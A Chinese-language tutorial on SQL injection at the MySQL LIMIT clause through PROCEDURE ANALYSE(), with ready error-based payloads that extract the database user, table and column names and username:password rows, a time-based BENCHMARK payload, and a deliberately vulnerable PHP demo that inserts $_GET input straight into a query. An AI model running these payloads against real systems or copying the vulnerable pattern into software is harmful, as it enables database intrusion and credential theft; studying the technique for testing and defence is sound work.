sql注入在组合拼接方面一直都很灵活,因为语法本身就很灵活,不过Mysql的Limit下一直没办法注入,国外大牛发表了个SQL Injections in MySQL LIMIT clause的paper,意在利用Mysql的一个优化建议函数ANALYSE()进行Limit处注入,
此方法适用于Mysql5.x
.
SELECT freld FROM table WHERE id>0 ORDER BY id LIMIT injection_point
像这样的语句,由于后面跟着ORDER BY
,所以无法UNION联合查询注入,那么就需要在LIMIT上找出路了
Mysql5的SELETCT
语法:
SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]
LIMIT后面跟了两个函数,PROCEDURE和INTO,INTO除非有写入shell的权限,否则是无法利用的,那就看看PROCEDURE函数下能否注入.
一个测试表:
ANALYSE函数是可以查看表的优化建议
PROCEDURE ANALYSE([max_elements,[max_memory]])
ANALYSE函数后面可以有两个参数:
select * from injection where id>0 order by id limit 0,1 procedure analyse(1,1);
看起来并不是很好,尝试下在max_elements
处添加条件表达式:
SELECT * from injection where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
但是立即返回了一个错误信息:
sleep函数没执行,不过还是有办法的,利用updatexml or extractvalue函数进行报错注入:
爆用户名:
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,user()),0),1);
爆表:
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0),1);
爆字段:
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='injection' limit 0,1)),0),1);
爆数据:
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat_ws(':',id,username,password) from injection limit 0,1)),0),1);
如果不支持报错注入的话,还可以基于时间注入:
SELECT * FROM injection WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1);
一个Demo:
<?php
/** * Created by PhpStorm. * User: Tr3jer * Date: 15/1/24 * Time: 下午9:55 */ include "Class_Mysql_Db_Model.php"; $cof=new Config(); $obj=new Mysql_Db_Model(); $obj->connect($cof); $sql="select * from injection where id>0 order by id limit 0,{$_GET['id']}"; if($obj->query($sql)){ var_dump($row); }else{ die(mysql_error()); } mysql_close($obj);
执行的语句:
Mysql内建的特性有很多,不过能够利用的缺陷还有待挖掘:)